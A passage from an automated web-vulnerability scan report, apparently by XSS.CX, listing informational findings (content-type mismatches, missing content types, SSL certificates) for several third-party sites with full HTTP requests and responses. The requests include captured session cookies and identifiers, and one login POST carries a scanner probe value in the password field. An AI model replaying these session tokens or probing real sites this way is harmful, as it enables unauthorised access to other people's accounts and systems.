Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 5596

/*************************************************
   . Copyright 2006 - 2009 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission o
...[SNIP]...

33.87. http://www.smpone.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /javascript/image_pop.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

33.88. http://www.smpone.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.smpone.com
Path:   /javascript/showimages.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.smpone.com
Proxy-Connection: keep-alive
Referer: http://www.smpone.com/?gclid=CLbB86LPt6gCFSIRNAod2E3lCQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utmz=207027601.1303732845.1.1.utmgclid=CLbB86LPt6gCFSIRNAod2E3lCQ|utmccn=(not%20set)|utmcmd=(not%20set); __utma=207027601.661607507.1303732845.1303732845.1303732845.1; __utmc=207027601; __utmb=207027601.1.10.1303732845; TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=7723f22f24f91f5a8b45b95e78b94b17; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733867

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:17:47 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

33.89. http://www.tresware.com/javascript/bbcode.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/bbcode.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/bbcode.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2394

function x() {
   return;
}

var thisForm;

function mozWrap(txtarea, lft, rgt, pmt, pmr) {
   var selLength = txtarea.textLength;
   var selStart = txtarea.selectionStart;
   var selEnd = txtarea.se
...[SNIP]...

33.90. http://www.tresware.com/javascript/common.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/common.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/common.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1364

/*************************************************
   . Copyright 2006 - 2008 Tres Media Group, Inc.
   The code contained within cannot be reproduced
   or modified without the expressed permission of:
   Tr
...[SNIP]...

33.91. http://www.tresware.com/javascript/edittags.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/edittags.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/edittags.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 1561

adminbuttonsFlag = false;
function adminbuttons() {

   var divareas = document.getElementsByTagName('button');
   var editbuttons = new Array();
   for(var i in divareas) {
       if(divareas[i].id) {


...[SNIP]...

33.92. http://www.tresware.com/javascript/image_pop.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/image_pop.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/image_pop.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 2298

// <a href="me.jpg" onclick="return popImage(this.href,'Site author');">link</a>

//really not important (the first two should be small for Opera's sake)
PositionX = 10;
PositionY = 10;
defaultWi
...[SNIP]...

33.93. http://www.tresware.com/javascript/showimages.php  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.tresware.com
Path:   /javascript/showimages.php

Issue detail

The response contains the following Content-type statement:The response states that it contains HTML. However, it actually appears to contain script.

Request

GET /javascript/showimages.php HTTP/1.1
Host: www.tresware.com
Proxy-Connection: keep-alive
Referer: http://www.tresware.com/
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: TresCMS[tres_uid]=1; TresCMS[tres_group]=0; TresCMS[ident]=17a4f0f1f985027144d272b8c27916a5; TresCMS[last_visit]=0; TresCMS[timezone]=EDT; TresCMS[user_ip]=173.193.214.243; TresCMS[last_visit_temp]=1303733900

Response

HTTP/1.1 200 OK
Date: Mon, 25 Apr 2011 12:18:21 GMT
Server: Apache/2.0.63 (Unix) mod_ssl/2.0.63 OpenSSL/0.9.8e-fips-rhel5 mod_auth_passthrough/2.1 mod_bwlimited/1.4 FrontPage/5.0.2.2635
X-Powered-By: PHP/5.3.2
Content-Type: text/html
Content-Length: 317

function showimage() {
   if (!document.images)
       return
       document.images.avatar.src= 'images/Avatars/' + document.Register.av_avatar_pre.options[document.Register.av_avatar_pre.selectedIndex].value
...[SNIP]...

33.94. http://www.trucklist.ru/webroot/delivery/js/scripts.js  previous  next

Summary

Severity:   Information
Confidence:   Firm
Host:   http://www.trucklist.ru
Path:   /webroot/delivery/js/scripts.js

Issue detail

The response contains the following Content-type statement:The response states that it contains script. However, it actually appears to contain unrecognised content.

Request

GET /webroot/delivery/js/scripts.js?v= HTTP/1.1
Host: www.trucklist.ru
Proxy-Connection: keep-alive
Referer: http://www.trucklist.ru/cars/trucks?utm_source=y_direct&utm_medium=cpc&utm_campaign=truck&_openstat=ZGlyZWN0LnlhbmRleC5ydTsxNzg5NDA3OzUzNzQ4MDA7eWFuZGV4LnJ1Omd1YXJhbnRlZQ
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: PHPSESSID=94671815d78a1c937988b0a45101e82d; records_per_page=30

Response

HTTP/1.1 200 OK
Server: nginx/0.7.64
Date: Mon, 25 Apr 2011 14:41:04 GMT
Content-Type: application/x-javascript; charset=utf-8
Content-Length: 59289
Last-Modified: Tue, 01 Mar 2011 08:25:06 GMT
Connection: keep-alive
Expires: Wed, 25 May 2011 14:41:04 GMT
Cache-Control: max-age=2592000
Accept-Ranges: bytes

...window.reEmail = /^([\w\.\-])+@(([a-zA-Z0-9\-])+\.)+([a-zA-Z0-9]{2,4})+$/i;

var w3cDOM = (typeof document.getElementById != "undefined" && typeof document.createElement != "undefined") ? true : fa
...[SNIP]...

34. Content type is not specified  previous  next
There are 5 instances of this issue:


34.1. https://checkout.netsuite.com/server-info  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /server-info

Request

GET /server-info HTTP/1.1
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Host: checkout.netsuite.com
Accept-Encoding: gzip, deflate

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length:137

<html><head><META http-equiv="refresh" content="0 ;URL=http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T"/></head></html>

34.2. https://checkout.netsuite.com/server-status  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /server-status

Request

GET /server-status HTTP/1.1
Host: checkout.netsuite.com
Connection: keep-alive
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: JSESSIONID=1J6WN1GLD7YF97mg4NnnrJtMTLyyBTLW5SC2xnzp2bL1BkKjmqzhQtgw4LDqyWffYxnJ5rLVX4VWGGxBLnQ6WdW126sPpQ9GcKxyvKTvtWBTh6tB9XplC3VFTz911rXl!1384455285; NLVisitorId=rcHW8415AZeYvnmq; NLShopperId=rcHW8415AciYvvMS; NS_VER=2011.1.0; bn_u=6923519460848807096; mbox=session#1303736347554-914602#1303744322|PC#1303736347554-914602.17#1366814462|check#true#1303742522

Response

HTTP/1.1 404 Not Found
Connection: close
Content-Length:137

<html><head><META http-equiv="refresh" content="0 ;URL=http://www.netsuite.com/pages/portal/page_not_found.jspinternal=T"/></head></html>

34.3. https://hourly.deploy.com/hmc/report/index.cfm  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://hourly.deploy.com
Path:   /hmc/report/index.cfm

Request

POST /hmc/report/index.cfm? HTTP/1.1
Referer: https://hourly.deploy.com/hmc/report/
User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 1.1.4322)
Cache-Control: no-cache
Content-Type: application/x-www-form-urlencoded
Host: hourly.deploy.com
Cookie: JSESSIONID=3e30aecfc2d1617d7f5d
Expect: 100-continue
Accept-Encoding: gzip, deflate
Connection: Keep-Alive
Content-Length: 51

j_password=http://netsparker.com/n&j_username=Smith

Response

HTTP/1.1 100 Continue

HTTP/1.0 200 OK
Date: Mon, 25 Apr 2011 13:41:36 GMT
Server: Apache/2.0.46 (Red Hat)
Set-Cookie: CFAUTHORIZATION_hmc5_prod_delroy=;expires=Sun, 25-Apr-2010 13:41:39 GMT;path=/
Content-Language: en-
...[SNIP]...
</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

<link href="/styles/albertson2_3_production_Sep24/hmc.css" rel="stylesheet" type="text/css">
...[SNIP]...

34.4. http://kronos.tt.omtrdc.net/m2/kronos/mbox/standard  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://kronos.tt.omtrdc.net
Path:   /m2/kronos/mbox/standard

Request

GET /m2/kronos/mbox/standard?mboxHost=www.kronos.com&mboxSession=1303738433760-48782&mboxPage=1303739507367-90386&screenHeight=1200&screenWidth=1920&browserWidth=1125&browserHeight=981&browserTimeOffset=-300&colorDepth=16&mboxCount=1&param1=test%2Cparam2%3Dtest&mbox=Button_cta_right_rail&mboxId=0&mboxTime=1303721507457&mboxURL=http%3A%2F%2Fwww.kronos.com%2Fkronos-site-usage-privacy-policy.aspx&mboxReferrer=&mboxVersion=40 HTTP/1.1
Host: kronos.tt.omtrdc.net
Proxy-Connection: keep-alive
Referer: http://www.kronos.com/kronos-site-usage-privacy-policy.aspx
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3

Response

HTTP/1.1 200 OK
Content-Length: 102
Date: Mon, 25 Apr 2011 13:51:37 GMT
Server: Test & Target

mboxFactories.get('default').get('Button_cta_right_rail',0).setOffer(new mboxOfferDefault()).loaded();

34.5. http://partner-support.wiki.zoho.com/favicon.ico  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   http://partner-support.wiki.zoho.com
Path:   /favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: partner-support.wiki.zoho.com
Proxy-Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US) AppleWebKit/534.16 (KHTML, like Gecko) Chrome/10.0.648.205 Safari/534.16
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: zwcsrfcki=dcebcee0-6d9d-446f-8e91-6618ac1b7fdd; JSESSIONID=D42EBA6A1D444AECC44D46E1F5687ABF

Response

HTTP/1.1 200 OK
Pragma: no-cache
Cache-Control: no-cache
Expires: Thu, 01 Jan 1970 00:00:00 GMT
ETag: W/"1150-1301472610000"
Last-Modified: Wed, 30 Mar 2011 08:10:10 GMT
Content-Length: 1150
Date: Mon, 25 Apr 2011 12:15:20 GMT
Server: Apache-Coyote/1.1

............ .h.......(....... ..... ...........................C...C...B...C...C...C...C...B...C...C...B...C...C...C...C...C...G...G...F...F...G...F...F...F...G...G...G...F...F...F...F...F...J...J...
...[SNIP]...

35. SSL certificate  previous
There are 5 instances of this issue:


35.1. https://checkout.netsuite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://checkout.netsuite.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  checkout.netsuite.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jul 08 19:00:00 CDT 2009
Valid to:  Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

35.2. https://forms.netsuite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://forms.netsuite.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.netsuite.com
Issued by:  Go Daddy Secure Certification Authority
Valid from:  Thu Jan 07 17:22:23 CST 2010
Valid to:  Mon Jan 07 17:22:23 CST 2013

Certificate chain #1

Issued to:  Go Daddy Secure Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Wed Nov 15 19:54:37 CST 2006
Valid to:  Sun Nov 15 19:54:37 CST 2026

Certificate chain #2

Issued to:  Go Daddy Class 2 Certification Authority
Issued by:  Go Daddy Class 2 Certification Authority
Valid from:  Tue Jun 29 12:06:20 CDT 2004
Valid to:  Thu Jun 29 12:06:20 CDT 2034

35.3. https://store.manageengine.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://store.manageengine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  store.manageengine.com
Issued by:  GeoTrust Extended Validation SSL CA
Valid from:  Mon Jan 11 17:11:42 CST 2010
Valid to:  Fri Jan 13 20:12:48 CST 2012

Certificate chain #1

Issued to:  GeoTrust Extended Validation SSL CA
Issued by:  GeoTrust Primary Certification Authority
Valid from:  Tue Nov 28 18:00:00 CST 2006
Valid to:  Mon Nov 28 17:59:59 CST 2016

Certificate chain #2

Issued to:  GeoTrust Primary Certification Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Tue Nov 28 10:08:31 CST 2006
Valid to:  Tue Aug 21 10:08:31 CDT 2018

Certificate chain #3

Issued to:  Equifax Secure Certificate Authority
Issued by:  Equifax Secure Certificate Authority
Valid from:  Sat Aug 22 11:41:51 CDT 1998
Valid to:  Wed Aug 22 11:41:51 CDT 2018

35.4. https://system.netsuite.com/  previous  next

Summary

Severity:   Information
Confidence:   Certain
Host:   https://system.netsuite.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  system.netsuite.com
Issued by:  VeriSign Class 3 Extended Validation SSL SGC CA
Valid from:  Wed Jul 08 19:00:00 CDT 2009
Valid to:  Sat Jul 09 18:59:59 CDT 2011

Certificate chain #1

Issued to:  VeriSign Class 3 Extended Validation SSL SGC CA
Issued by:  VeriSign Class 3 Public Primary Certification Authority - G5
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Mon Nov 07 17:59:59 CST 2016

Certificate chain #2

Issued to:  VeriSign Class 3 Public Primary Certification Authority - G5
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Tue Nov 07 18:00:00 CST 2006
Valid to:  Sun Nov 07 17:59:59 CST 2021

Certificate chain #3

Issued to:  Class 3 Public Primary Certification Authority
Issued by:  Class 3 Public Primary Certification Authority
Valid from:  Sun Jan 28 18:00:00 CST 1996
Valid to:  Wed Aug 02 18:59:59 CDT 2028

35.5. https://www.manageengine.com/  previous

Summary

Severity:   Information
Confidence:   Certain
Host:   https://www.manageengine.com
Path:   /

Issue detail

The server presented a valid, trusted SSL certificate. This issue is purely informational.

The server presented the following certificates:

Server certificate

Issued to:  *.manageengine.com
Issued by:  RapidSSL CA
Valid from:  Mon Mar 14 03:35:25 CDT 2011
Valid to:  Tue May 15 23:54:57 CDT 2012

Certificate chain #1

Issued to:  RapidSSL CA
Issued by:  GeoTrust Global CA
Valid from:  Fri Feb 19 16:45:05 CST 2010
Valid to:  Tue Feb 18 16:45:05 CST 2020

Certificate chain #2

Issued to:  GeoTrust Global CA
Issued by:  GeoTrust Global CA
Valid from:  Mon May 20 23:00:00 CDT 2002
Valid to:  Fri May 20 23:00:00 CDT 2022

Report generated by XSS.CX at Mon Apr 25 10:22:20 CDT 2011.